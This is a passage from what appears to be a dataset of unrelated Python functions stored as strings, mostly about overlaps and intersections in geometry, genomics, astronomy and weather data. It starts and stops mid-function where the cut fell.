nextloc == \"on\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif prevloc == \"on\":\n if nextloc == \"on\":\n c.entry = None\n elif nextloc == \"out\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif nextloc == \"in\":\n c.entry = \"en\" if c_entry else \"ex\"\n\n self.anyinside = False\n\n # set clip\n prevsingle = None\n for c in clip.iter():\n if c.intersect:\n mark_flags(self, c, c_entry)\n # set couple\n if c.entry in (\"ex\",\"en\"):\n if prevsingle and c.entry == prevsingle.entry:\n c.couple = prevsingle\n prevsingle.couple = c\n prevsingle = c\n # set crosschange\n # some modifications based on implementation in qt clipper source code\n #if c.entry == \"en/ex\" == c.neighbour.entry or c.entry == \"ex/en\" == c.neighbour.entry:\n if False: #c.entry == \"en/ex\" or c.entry == \"ex/en\":\n print(\"Maybe crosschange...\")\n # tri1\n #a,b,c = c.neighbour.prev, c.prev, c.neighbour.next\n a,b,c = c.neighbour.__next__, c.prev, c.neighbour.prev\n dir1 = 0.5 * (a.x * (b.y-c.y) +\n b.x * (c.y-a.y) +\n c.x * (a.y-b.y))\n # tri2\n #a,b,c = c.neighbour.prev, c.prev, c.next\n a,b,c = c.__next__, c.prev, c.neighbour.prev\n dir2 = 0.5 * (a.x * (b.y-c.y) +\n b.x * (c.y-a.y) +\n c.x * (a.y-b.y))\n print(dir1,dir2)\n #if dir1 < 0 != dir2 < 0: # different orientation\n if (dir1 * dir2) < 0: # different orientation means at least one negative, making the results less than 0\n print(\"CROSSCHANGE!!!\")\n c.cross_change = True\n c.neighbour.cross_change = True # not sure if should set neighbour too\n\n # maybe early abort\n if not self.anyinside and intersectionmode:\n return []\n\n # what about perfect overlap???\n # ...\n\n if False: #DEBUG:\n print(\"view clip entries\")\n for c in clip.iter():\n print(c, c.entry)\n\n # find first isect where both neighbours have valid flag\n for c in clip.iter():\n if c.entry:\n s = c.neighbour\n mark_flags(clip, s, s_entry)\n if s.entry:\n first_c = c\n first_s = s\n # print 777,s.entry\n break\n\n else:\n return specialcase_insidetest()\n #raise Exception(\"weird special case, no neighbours that both have flag left\")\n \n # autoset subj, if neighbour of first is different, then set all as opposite\n # TODO: how deal with s_entry in case of different modes...?\n print(\"view first\")\n print(first_c, first_c.entry)\n print(first_s, first_s.entry)\n if first_c.entry != first_s.entry: # and s_entry: # this is the behaviour for standard intersect mode, otherwise flip, hence the s_entry\n for c in clip.iter():\n if c.entry:\n if c.entry == \"en\": c.neighbour.entry = \"ex\"\n elif c.entry == \"ex\": c.neighbour.entry = \"en\"\n elif c.entry == \"en/ex\": c.neighbour.entry = \"ex/en\"\n elif c.entry == \"ex/en\": c.neighbour.entry = \"en/ex\"\n \n # else set all same\n else:\n for c in clip.iter():\n if c.entry:\n c.neighbour.entry = c.entry\n\n # set couple for subj (not sure if needed)\n prevsingle = None\n for s in self.iter():\n if s.entry:\n if s.entry in (\"ex\",\"en\"):\n if prevsingle and s.entry == prevsingle.entry:\n s.couple = prevsingle\n prevsingle.couple = s\n prevsingle = s\n\n if False: #DEBUG: \n print(\"view subj entries\")\n for s in self.iter():\n print(s, s.entry)\n\n\n\n\n\n # phase three - construct a list of clipped polygons\n # --------------------------------------------------\n\n ######\n # Defs\n def next_unprocessed(vert):\n origvert = vert\n while vert:\n if vert.entry and not (vert.checked or vert.neighbour.checked):\n #print \"vert, found next unproc\", vert, vert.checked, vert.neighbour.checked\n if vert.couple:\n # rule 1\n if vert.couple.entry and vert.entry:\n # rule 2\n if vert.couple.entry == \"en\" and vert.entry == \"en\":\n return vert.couple\n elif vert.couple.entry == \"ex\" and vert.entry == \"ex\":\n return vert\n # rule 3\n else:\n return vert\n \n vert = vert.__next__\n \n if vert == origvert:\n # if returned to first, return None\n return None\n\n def DeleteFlag1(cur, stat):\n if cur.entry == \"en/ex\":\n cur.entry = None\n if cur.cross_change:\n if stat == \"D3\":\n return \"D3\"\n else:\n return \"D4\"\n if stat == \"D3\":\n return \"D4\"\n else:\n return \"D3\"\n if cur.entry == \"ex/en\":\n if stat == \"D3\":\n cur.entry = \"en\"\n return \"D2\"\n else:\n cur.entry = \"ex\"\n return \"D1\"\n if cur.entry == \"en\":\n cur.entry = None\n return \"D1\"\n if cur.entry == \"ex\":\n cur.entry = None\n return \"D2\"\n\n def DeleteFlag2(cur, prev, stat):\n if cur.entry == \"en/ex\":\n if stat == \"D1\":\n cur.entry = \"ex\"\n else:\n cur.entry = \"en\"\n if cur.cross_change:\n if stat == \"D1\":\n return \"D4\"\n else:\n return \"D3\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"ex/en\":\n if stat == \"D1\":\n cur.entry = \"en\"\n else:\n cur.entry = \"ex\"\n if cur.cross_change:\n if stat == \"D1\":\n return \"D4\"\n else:\n return \"D3\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"en\":\n cur.entry = None\n if stat == \"D1\" and cur.couple and prev.couple == cur:\n return \"D1\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"ex\":\n cur.entry = None\n if stat != \"D1\" and cur.couple and prev.couple == cur:\n return \"D2\"\n else:\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n\n def proceed(cur, stat):\n cur.checked = True\n if stat == \"D1\":\n clipped.add(Vertex(cur))\n return cur.__next__\n elif stat == \"D2\":\n clipped.add(Vertex(cur))\n return cur.prev\n else:\n return cur.neighbour\n\n ####\n resultpolys = []\n\n self.first.checked = True\n cur = prev = start = next_unprocessed(self.first)\n\n while cur:\n # each new polygon\n print(\"new poly\")\n\n stat = DeleteFlag1(cur, \"D3\")\n if DEBUG: print(\"v\", cur, cur.entry, stat)\n clipped = Polygon()\n cur = proceed(cur, stat)\n\n # collect vertexes\n while cur != start:\n if DEBUG: print(\"v\", cur, cur.entry, stat)\n if cur.entry:\n if stat == \"D1\" or stat == \"D2\":\n stat = DeleteFlag2(cur, prev, stat)\n else:\n stat = DeleteFlag1(cur, stat)\n prev = cur\n cur = proceed(cur, stat)\n\n # return to first vertex\n clipped.add(Vertex(clipped.first))\n\n print(clipped)\n\n resultpolys.append((clipped,[]))\n cur = prev = start = next_unprocessed(self.first)\n\n\n\n # finally, sort into exteriors and holes\n for pindex,(polyext,polyholes) in enumerate(resultpolys):\n for otherext,otherholes in resultpolys:\n if polyext == otherext:\n continue # don't compare to self\n if polyext.first.isInside(otherext):\n otherholes.append(polyext) #poly is within other so make into a hole\n del resultpolys[pindex] #and delete poly from being an independent poly\n return resultpolys", "def _check_common_start(self, valid_list):\n start_list = list(\n set([item.coords[\"time\"].values[0] for item in valid_list])\n )\n if len(start_list) != 1:\n return False\n return True", "def overlap_ss(Ax, Ay, Az, Cx, Cy, Cz, alpha_bra, alpha_ket, c1, c2):\n A = np.array([Ax, Ay, Az])\n C = np.array([Cx, Cy, Cz])\n alpha_sum = alpha_bra + alpha_ket\n return c1 * c2 * (np.pi / alpha_sum)**(3/2) * np.exp((-alpha_bra * alpha_ket * np.dot(A-C, A-C)) / alpha_sum)", "def remove_citation_overlaps(text, possible_markers):\n return [(m, start, end) for m, start, end in possible_markers\n if not any((e.start <= start and e.end >= start)\n or (e.start <= end and e.end >= end)\n or (start <= e.start and end >= e.end)\n for e in internal_citations(text))]", "def compute_start_end_points(linestrings):\n starts = []\n stops = []\n for ls in linestrings:\n pt = Point(ls.coords[0])\n starts.append(round(CONUS[\"poly\"].exterior.project(pt), 2))\n pt = Point(ls.coords[-1])\n stops.append(round(CONUS[\"poly\"].exterior.project(pt), 2))\n return starts, stops", "def match_coords_v2(list1, list2, tol = 1.5):\n tol1, tol2 = tol/3600.0, (tol/3600.0)**2\n jmin, match_idx, best_dr2 = 0, [None]*len(list1), [tol2]*len(list1)\n # Unpack the RAs and DECs of everything into numpy arrays.\n list1ra = np.array([c.ra for c in list1])\n list2ra = np.array([c.ra for c in list2])\n list1dec = np.array([c.dec for c in list1])\n list2dec = np.array([c.dec for c in list2])\n # This next bit is rather tricky because we have to sort the lists,\n # but also remember where we put each item. Here i, j = sorted indices,\n # while ci[i], ci[j] = corresponding actual indices in original lists.\n # Introduce transformed lists to economize on indexing.\n ci, cj = list1ra.argsort(), list2ra.argsort()\n slist1ra, slist1dec = list1ra[ci], list1dec[ci]\n slist2ra, slist2dec = list2ra[cj], list2dec[cj]\n # Since there's no sense in searching outside the bounds of the arrays,\n # extract the indices of only those elements within the rectangular\n # overlap area (we'll mostly be dealing with equatorial rectangles).\n # Reindex the lists to the originals.\n R0, R1 = max(min(list1ra), min(list2ra)), min(max(list1ra), max(list2ra))\n D0, D1 = max(min(list1dec), min(list2dec)), min(max(list1dec), max(list2dec))\n ci = ci[np.all([slist1ra >= R0, slist1dec >= D0,\n slist1ra <= R1, slist1dec <= D1], axis=0)]\n cj = cj[np.all([slist2ra >= R0, slist2dec >= D0,\n slist2ra <= R1, slist2dec <= D1], axis=0)]\n slist1ra, slist1dec = list1ra[ci], list1dec[ci]\n slist2ra, slist2dec = list2ra[cj], list2dec[cj]\n # Finally, start going through the lists again.\n for i in range(len(slist1ra)):\n decmin, decmax = slist1dec[i] - tol1, slist1dec[i] + tol1\n CD = np.cos(0.5*(decmin+decmax)*np.pi/180.0)\n ramin, ramax = slist1ra[i] - tol1/CD, slist1ra[i] + tol1/CD\n # Inch along in list2 until we find the part that matches list1 in RA\n while jmin < len(slist2ra) and slist2ra[jmin] < ramin: jmin += 1\n # No point going past the end of the list\n if jmin == len(slist2ra): break\n # Now go through all the RA matches and check the RA+DEC distance.\n j = jmin\n while j < len(slist2ra) and slist2ra[j] < ramax:\n # Check in the box before finding the angular distance\n if slist2dec[j] > decmin and slist2dec[j] < decmax:\n dr2 = ((CD*(slist1ra[i]-slist2ra[j]))**2 +\n (slist1dec[i]-slist2dec[j])**2)\n if dr2 < best_dr2[ci[i]]:\n match_idx[ci[i]], best_dr2[ci[i]] = cj[j], dr2\n j += 1\n # Save and return the index in list2 of the best-matched object to each\n # item in list1, and the distances between corresponding best matches.\n best_dr = [np.sqrt(dr2)*3600 for dr2 in best_dr2]\n return match_idx, best_dr", "def overlaps(vals, perc=.5):\n underlaps = []\n if len(vals) > 0:\n underlaps.append(vals[0])\n for val in vals:\n i = 0\n amount = len(underlaps)\n inv = 1\n while (inv):\n\n if (i == amount):\n underlaps.append(val)\n inv = False\n elif poverlap(underlaps[i][1], val[1],\n underlaps[i][2], val[2]) >= perc:\n if val[0] > underlaps[i][0]:\n underlaps[i] = val\n inv = False\n else:\n i += 1\n \n return underlaps", "def populate_agdds(start_date, end_date, source, source_id, stations):\r\n # possibly grab ACIS station data (for entire date range)\r\n if source == 'ACIS':\r\n station_ids = []\r\n for station in stations:\r\n station_ids.append(station['char_network_id'])\r\n acis_data = get_acis_climate_data(\",\".join(station_ids), 'mint,maxt,gdd32,gdd50', start_date, end_date)\r\n\r\n for station in stations:\r\n print(station['char_network_id'])\r\n # grab previous days tmin, tmax, and agdd for both bases from mysql agdds table and start over at year breaks\r\n day_before_start_date = start_date - timedelta(days=1)\r\n if day_before_start_date.year == start_date.year:\r\n prev_tmin = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'tmin')\r\n prev_tmax = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'tmax')\r\n agdd32 = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'agdd')\r\n agdd50 = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 50, 'agdd')\r\n else:\r\n prev_tmin = None\r\n prev_tmax = None\r\n agdd32 = None\r\n agdd50 = None\r\n\r\n if prev_tmin is None or prev_tmin == 'M':\r\n prev_tmin = 0\r\n if prev_tmax is None or prev_tmax == 'M':\r\n prev_tmax = 0\r\n if agdd32 is None or agdd32 == 'M':\r\n agdd32 = 0\r\n if agdd50 is None or agdd50 == 'M':\r\n agdd50 = 0\r\n\r\n # possibly find station of interest from ACIS retrieved data\r\n acis_station = None\r\n if source == 'ACIS':\r\n station_found = False\r\n for a_station in acis_data['data']:\r\n if station_found:\r\n break\r\n for sid in a_station['meta']['sids']:\r\n # print(sid)\r\n # print(station['char_network_id'])\r\n if station['char_network_id'] in sid:\r\n station_found = True\r\n acis_station = a_station\r\n break\r\n if not station_found:\r\n print(\"Could not find station \" + station['char_network_id'])\r\n\r\n previous_year = start_date.year\r\n delta = end_date - start_date\r\n for i in range(delta.days + 1):\r\n day = start_date + timedelta(days=i)\r\n doy = day.timetuple().tm_yday\r\n\r\n # reset the agdd to 0 if we go into a new year\r\n if previous_year != day.year:\r\n agdd32 = 0\r\n agdd50 = 0\r\n previous_year = day.year\r\n\r\n missing_data = False\r\n print(day.strftime(\"%Y-%m-%d\"))\r\n\r\n # see if we already have tmin and tmax from local db\r\n # tmin = None\r\n # tmax = None\r\n tmin = get_element_from_qc_table(station['station_id'], source_id, day, 32, 'tmin')\r\n tmax = get_element_from_qc_table(station['station_id'], source_id, day, 32, 'tmax')\r\n\r\n already_retrieved = False\r\n if tmin is not None and tmin != 'M' and tmax is not None and tmax != 'M' and source != 'PRISM':\r\n already_retrieved = True\r\n\r\n # don't already have tmin and tmax locally so grab from URMA postgis db or ACIS data\r\n if not already_retrieved:\r\n if source == 'URMA':\r\n if station['char_value'] == 'AK':\r\n tmin = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmin', 'alaska')\r\n tmax = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmax', 'alaska')\r\n else:\r\n tmin = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmin', 'conus')\r\n tmax = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmax', 'conus')\r\n # URMA and PRISM are in celsius in our postgis db everything else is Fer so convert here\r\n if tmin is not None:\r\n tmin = tmin * 1.8 + 32\r\n if tmax is not None:\r\n tmax = tmax * 1.8 + 32\r\n elif source == 'PRISM':\r\n tmin = get_prism_climate_data(station['longitude'], station['latitude'], day, 'tmin')\r\n tmax = get_prism_climate_data(station['longitude'], station['latitude'], day, 'tmax')\r\n if tmin is not None:\r\n tmin = tmin * 1.8 + 32\r\n if tmax is not None:\r\n tmax = tmax * 1.8 + 32\r\n elif acis_station is not None:\r\n tmin = acis_station['data'][i][0]\r\n tmax = acis_station['data'][i][1]\r\n\r\n # if tmin or tmax is missing, set to previous day's and mark as missing\r\n if tmin is not None and tmin != 'M':\r\n tmin = float(tmin)\r\n prev_tmin = tmin\r\n else:\r\n missing_data = True\r\n tmin = prev_tmin\r\n if tmax is not None and tmax != 'M':\r\n tmax = float(tmax)\r\n prev_tmax = tmax\r\n else:\r\n missing_data = True\r\n tmax = prev_tmax\r\n\r\n # compute gdd and agdd for both bases\r\n gdd32 = compute_gdd(tmin, tmax, 32)\r\n gdd50 = compute_gdd(tmin, tmax, 50)\r\n\r\n agdd32 += gdd32\r\n agdd50 += gdd50\r\n\r\n if not already_retrieved:\r\n # do an insert or update\r\n add_agdd_row(station['station_id'], source_id, gdd32, agdd32, day.year, doy, day, 32, missing_data, tmin, tmax)\r\n add_agdd_row(station['station_id'], source_id, gdd50, agdd50, day.year, doy, day, 50, missing_data, tmin, tmax)", "def adjacency_extraction_consistent(wfc_ns, pattern_cat):\n # This is a brute force implementation. We should really use the adjacency list we've already calculated...\n legal = []\n #print(f\"pattern_cat\\n{pattern_cat}\")\n for p1, pattern1 in enumerate(pattern_cat):\n for d_index, d in enumerate(wfc_ns.adjacency_directions):\n for p2, pattern2 in enumerate(pattern_cat):\n if is_valid_overlap_xy(d, p1, p2, pattern_cat, wfc_ns.pattern_width, wfc_ns.adjacency_directions):\n legal.append((d_index, p1, p2))\n return legal", "def get_exon_unions(x):\n if x.shape[0] == 1:\n return x\n\n # sort exons according to start position.\n x = x[np.argsort(x[:, 0]), :]\n concat_exons = list()\n\n # determine if exons bleed into any succeeding exons.\n # this happens if exon i's end position >= exon j's start position, j > i.\n for i in range(x.shape[0] - 1):\n bleeding = np.where(x[i, 1] >= x[(i + 1):, 0])[0]\n if len(bleeding) > 0:\n concat_exons.append([i, max(bleeding) + (i + 1)])\n\n if concat_exons:\n drop_exons = np.unique(flatten_2d(concat_exons))\n union_exons = list()\n\n # take min(start), max(end) for exons with overlap.\n for j in np.unique([z[1] for z in concat_exons]):\n bleed_start = np.min(np.where([z[1] == j for z in concat_exons])[0])\n start = x[concat_exons[bleed_start][0]][0]\n end = x[j][1]\n union_exons.append([start, end])\n\n # drop old intersecting exons and stack up newly unioned exons.\n x = np.delete(x, obj=drop_exons, axis=0)\n x = np.vstack([x, np.vstack(union_exons)])\n x = np.unique(x, axis=0)\n x = x[np.argsort(x[:, 0]), :]\n\n return x", "def combine_overlapping_contigs(sc_ov, scaffold_list): \n for k in sc_ov:\n \n conflict = False\n nos = len(sc_ov[k])\n sca_lis = []\n l_length = {}\n r_length = {}\n for n in range(nos):\n \n sca_lis.append(sc_ov[k][n])\n p = sca_lis[n].index(k)\n l_length[n] = p+1\n r_length[n] = len(sca_lis[n]) - p-1\n \n l_longest = max(l_length, key=l_length.get)\n r_longest = max(r_length, key=r_length.get) \n new_scaff = sca_lis[l_longest][:l_length[l_longest]] + sca_lis[r_longest][-r_length[r_longest]:]\n \n alt_scaff = []\n for n in range(nos):\n if str(sca_lis[n][1:-1])[1:-1] not in str(new_scaff): \n conflict = True \n split_scaffs = split_at_conflict(new_scaff, sca_lis[n], k)\n for scaff in split_scaffs:\n if scaff not in alt_scaff:\n alt_scaff.append(scaff)\n\n if not conflict:\n scaffold_list.append(new_scaff)\n else: \n alt_scaff2 = purge_redundancy(alt_scaff) \n for new_scaff in alt_scaff2:\n if len(new_scaff) > 2: #exclude empty scaffolds\n scaffold_list.append(new_scaff)\n \n for scaff in sca_lis:\n if scaff in scaffold_list:\n scaffold_list.remove(scaff)\n else:\n scaff.reverse()\n if scaff in scaffold_list:\n scaffold_list.remove(scaff)\n \n return scaffold_list", "def detect_overlap_1d(first, first_length, second, second_length):\n first_end = first + first_length - 1\n second_end = second + second_length - 1\n return second_end >= first and first_end >= second", "def get_c2sIndsByRoi(rts, sopuids):\n \n # Get the ReferencedSOPInstanceUIDs from the ContourSequence by ROI:\n RSOPuidsByRoi = get_RSOPuidsByRoi(rts)\n \n c2sInds = []\n c2sIndsByRoi = []\n \n # Loop through each list of ReferencedSOPInstanceUIDs:\n for i in range(len(RSOPuidsByRoi)):\n inds = []\n \n for RefUid in RSOPuidsByRoi[i]:\n # Find the matching index of RefUid in sopuids:\n inds.append(sopuids.index(RefUid))\n \n c2sInds.extend(inds)\n c2sIndsByRoi.append(inds)\n \n return c2sIndsByRoi, c2sInds", "def find_CX_neighbours(list_of_atoms, atom_list):\n my_list = []\n atom_numbers = []\n for atom in list_of_atoms:\n for element in identify_bonds(atom, atom_list):\n if (((element[0].atom_name == \"CX\") or (element[0].atom_name == \"CY\")) and (element[0].atom_number not in atom_numbers)):\n my_list.append(element[0])\n atom_numbers.append(element[0].atom_number)\n return my_list", "def make_scaff_overlap_dict(contig_location):\n scaffold_overlaps = []\n sc_ov = {}\n for contig in contig_location:\n \n if contig[:4] == \"five\": \n\n if not contig_location[contig] in scaffold_overlaps:\n scaffold_overlaps.append(contig_location[contig])\n sc_ov[contig] = copy.deepcopy(contig_location[contig])\n \n #orient each scaffold so that contig k is fiveprime-threeprime\n #unless it is the first link in the scaffold\n # *** this will fail if the 'unique' contig occurs >1 time in the scaffold!\n # - but split_siamese should have taken care of that\n for k, v in sc_ov.items():\n for scaf in v:\n \n if scaf[1] == k or (other_end(k) in scaf and scaf.index(k) - scaf.index(other_end(k)) == 1):\n if k[:4] == \"five\": scaf.reverse() \n\n return sc_ov", "def overlap(s1, s2):\n j = len(s2) - 1\n while j >= 0 and not s1.endswith(s2[:j + 1]):\n j -= 1\n return j", "def check_for_overlapping_genes(sequence_record):\n overlapping_gene_pairs = []\n all_gene_positions = []\n for gene in sequence_record.features:\n # BCBio uses 0-based and end-exclusive positions (first-third base is bases 0,1,2, i.e range 0-3), \n # so add 1 to start and keep end as is to convert to 1-based-end-inclusive\n all_gene_positions.append((gene.location.start.position+1, gene.location.end.position, gene.id))\n all_gene_positions.sort()\n for gene1_data,gene2_data in itertools.izip(all_gene_positions,all_gene_positions[1:]):\n (gene1_start,gene1_end,gene1_name), (gene2_start,gene2_end,gene2_name) = gene1_data, gene2_data\n if gene1_end>=gene2_start:\n overlapping_gene_pairs.append((gene1_name,gene2_name))\n # check for \"gene1 contains gene2\", print a warning, since it can make other things not work right\n if gene1_end>=gene2_end:\n print(\"WARNING: gene %s is completely inside gene %s! \"%(gene1_name, gene2_name)\n +\"Various gene-position-related results may be inaccurate.\")\n return overlapping_gene_pairs\n # MAYBE-TODO rewrite it so it actually detects ALL overlaps? Right now if gene A contains nonoverlapping genes B and C, it'll sort them as (A,B,C) since A starts first, so it'll detect the (A,B) overlap, but it won't detect the (A,C) overlap because it doesn't CHECK (A,C), only (A,B) and (B,C). This could be fixed either by just brute-force checking all gene pairs (and then using DNA_basic_utilities.position_test_overlap), or by writing something prettier. In any case, not a priority, since generally genes DON'T OVERLAP AT ALL.", "def get_overlapping_indices(self):\n return self._get_atomic_overlaps()", "def overlaps(interval,intervals):\n return [x for x in intervals if interval.overlaps(x)]", "def get_overlap_time(begin_at_infected, end_at_infected, begin_at_contact, end_at_contact):\n\n\tbegin_at_infected = begin_at_infected\n\tbegin_at_contact = begin_at_contact\n\tend_at_infected = end_at_infected\n\tend_at_contact = end_at_contact\n\treturn (min(end_at_infected, end_at_contact) - max(begin_at_infected, begin_at_contact))", "def __is_position_overlapped(self, position, exon):\n start, end = self.__get_exon_coordinates(exon)\n return position >= start and position <= end", "def ranges_overlap(start1, end1, start2, end2):\n return start1 <= end2 and end1 >= start2", "def segmented_intersections(lines):\r\n\r\n intersections = []\r\n for i, group in enumerate(lines[:-1]):\r\n for next_group in lines[i+1:]:\r\n for line1 in group:\r\n for line2 in next_group:\r\n intersections.append(intersection(line1, line2)) \r\n\r\n return intersections", "def calc_cst_indices(modes_dir):\n\n def print_ind_names(inds, names, i_start, c_list, verbose=False):\n nami = iter(names)\n for i in inds:\n name = next(nami)\n\n if '-' in name:\n _name = name.split('-')\n mode_in = []\n for m in _name:\n mode_in += re.split('(\\D+)', m)[:]\n mode_in.append(i)\n mode_in.append(0)\n\n c = cc_degrees(mode_in)\n ind = 0\n for _c in c:\n ind += 2*_c + 1\n\n else:\n ind = sc_degrees(i)\n if ind == 0:\n continue\n ind -= 1\n\n i_start += ind\n if verbose:\n print(\"%i, %s\" % (i_start, name))\n c_list.append((i_start, name))\n\n return i_start, c_list\n\n m_sc, m_cc = read_modes_in(modes_dir)\n\n cst_inds = []\n cst_cc_inds = []\n dst_inds = []\n dst_cc_inds = []\n names = []\n names_cc = []\n for m in m_sc[1:]:\n mode = m.split()\n names.append(''.join(mode[:3]))\n\n cst_max = int(mode[3])\n mode_smax = max(max_sc_degrees(int(cst_max)))\n if cst_max > mode_smax:\n cst_max = mode_smax\n cst_inds.append(cst_max)\n\n dst_max = int(mode[4])\n if dst_max > mode_smax:\n dst_max = mode_smax\n dst_inds.append(dst_max)\n\n if m_cc is not None:\n no_cc = int(m_cc[0])\n for m in m_cc[1:no_cc+1]:\n mode = m.split()\n names_cc.append(''.join(mode[0:3]) + '-' + ''.join(mode[3:6]))\n\n cst_cc_max = int(mode[6])\n cst_cc_inds.append(cst_cc_max)\n\n dst_cc_max = int(mode[7])\n dst_cc_inds.append(dst_cc_max)\n coef_order = []\n ind, coef_order = print_ind_names(cst_inds, names, 0, coef_order)\n if m_cc is not None:\n ind, coeff_order = print_ind_names(cst_cc_inds, names_cc, ind,\n coef_order)\n ind, coef_order = print_ind_names(dst_inds, names, ind, coef_order)\n\n if m_cc is not None:\n ind, coef_order = print_ind_names(dst_cc_inds, names_cc, ind,\n coef_order)\n\n return coef_order", "def get_available_cops():\n allIncidents = Incident.get_all()\n cops = []\n \n for i in allIncidents:\n if(inicioAmostragem <= i.reporting_date and i.reporting_date <=terminoAmostragem):\n cops.append(i['operations_center']['id'])\n \n allReports = RelatoDeSituacao.get_all()\n \n for r in allReports:\n if (\n inicioAmostragem <= r.data_hora and \n r.data_hora <=terminoAmostragem and\n 'cop' in r.relator and # todos tem que ter o COP\n 'id' in r.relator['cop'] # todos tem que ter o id \n ):\n cops.append(r.relator['cop']['id'])\n \n return set(cops)", "def overlap_checker(x1, y1, x2, y2, all_coord):\n overlaps = False\n i = 0\n start = 0\n for i in range(int(len(all_coord)/4)):\n b = all_coord[start:start + 4]\n start += 4\n try:\n if (max(b[0], b[2]) <= min(x1, x2) or max(x1, x2) <= min(b[0], b[2]) or max(b[1], b[3]) <= min(y1, y2) or max(y1, y2) <= min(b[1], b[3])):\n if not (min(x1, x2) <= min(b[0], b[2]) and min(y1, y2) <= min(b[1], b[3]) and max(x1, x2) >= max(b[0], b[2]) and max(y1, y2) >= max(b[1], b[3])):\n if not (min(b[0], b[2]) <= min(x1, x2) and min(b[1], b[3]) <= min(y1, y2) and max(b[0], b[2]) >= max(x1, x2) and max(b[1], b[3]) >= max(y1, y2)):\n overlaps = False\n else:\n return True\n else:\n return True\n else:\n return True\n except TypeError:\n overlaps = False\n if not overlaps:\n return False", "def segmented_intersections(lines):\n\n intersections = []\n for i, group in enumerate(lines[:-1]):\n for next_group in lines[i+1:]:\n for line1 in group:\n for line2 in next_group:\n intersections.append(intersection(line1, line2)) \n\n return intersections", "def find_all( source, substring, start=None, end=None, overlap=False ):\n return [x for x in find_all_iter( source, substring, start, end, overlap )]", "def get_segments(cst):\n assert isinstance(cst, ChromStruct)\n\n # create a set of coordinates for the start and end of segments\n segs = np.load(cst.sg_files)['sg']\n end = np.cumsum(segs)\n start = np.concatenate(([0], end[:-1]))\n\n return np.column_stack((start, end)).astype(int)", "def get_intersecting_dissemination_ids(cross_section, dissemination_areas):\n assert 'DAUID' in cross_section.columns \n dissem_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].DAUID.unique()\n reg_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].CSDUID.unique()\n# code_arr = dissemination_areas.loc[dissemination_areas['DAUID'].isin(np.unique(cross_section['DAUID'].values))].CODEID.unique()\n\n\n return list(dissem_arr), list(reg_arr)", "def test_overlap_set_basic_d(test_input_scheme, overlapped_records_generate):\n callers = ['MuTect2', 'MuSE', 'SomaticSniper']\n maf_lines = [\n [\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tINS\\t-\\tCC\\t-\\tCC\\t-\\t-\\t10\\t2\\t8\\t8\\t8\\t0\\t\\t\\n',\n ],\n 'chr1\\t1\\t1\\tSNP\\tA\\tC\\tA\\tC\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n',\n 'chr1\\t1\\t1\\tSNP\\tA\\tT\\tA\\tT\\tA\\tA\\t20\\t2\\t18\\t8\\t8\\t0\\t\\t\\n'\n ]\n\n record = overlapped_records_generate(\n test_input_scheme,\n maf_lines,\n callers)\n\n assert not record.is_singleton()\n\n assert ['MuSE', 'MuTect2', 'SomaticSniper'] == record.callers\n\n assert ('INS', 'SNP') == record.variant_types\n\n assert '1:1:C' in record.locus_allele_map\n assert '1:1:CC' in record.locus_allele_map\n assert '1:1:T' in record.locus_allele_map\n assert len(record.locus_allele_map) == 3\n assert len(record.locus_allele_map['1:1:C']) == 2\n assert len(record.locus_allele_map['1:1:T']) == 1\n assert len(record.locus_allele_map['1:1:CC']) == 1\n\n assert ('MuTect2', 'SNP') in record.caller_type_map \\\n and ('MuSE', 'SNP') in record.caller_type_map \\\n and ('SomaticSniper', 'SNP') in record.caller_type_map \\\n and ('MuTect2', 'INS') in record.caller_type_map\n\n assert len(record.caller_type_map) == 4\n\n assert record.all_single_record() is False", "def findSubsetIndices(min_lat,max_lat,min_lon,max_lon,lats,lons):\n res=np.zeros((4),dtype=np.float64)\n minLon=min_lon; maxLon=max_lon\n\n distances1 = []; distances2 = []\n indices=[]; index=1\n\n for point in lats:\n s1 = max_lat-point # (vector subtract)\n s2 = min_lat-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n distances1 = []; distances2 = []; index=1\n\n for point in lons:\n s1 = maxLon-point # (vector subtract)\n s2 = minLon-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n minJ=indices[1][2]\n maxJ=indices[0][2]\n minI=indices[3][2]\n maxI=indices[2][2]\n\n res[0]=minI; res[1]=maxI; res[2]=minJ; res[3]=maxJ\n return res", "def findsegments(id1, seq1, id2, seq2, minlen):\n\n segments = \"\"\n\n # Initialize list of corresponding residues.\n correspondances = []\n for res in seq1:\n correspondances.append([])\n \n # Main loop.\n for i in range(len(seq1)-minlen):\n seg1 = seq1[i:i+minlen]\n for j in range(len(seq2)-minlen):\n if j not in correspondances[i]:\n seg2 = seq2[j:j+minlen]\n if seg1 == seg2:\n # Look if the segment is longer than minlen.\n segments_equal = True\n prev1 = seg1\n prev2 = seg2\n extend = 1\n while segments_equal == True:\n i_end = i+minlen+extend\n j_end = j+minlen+extend\n ext1 = seq1[i:i_end]\n ext2 = 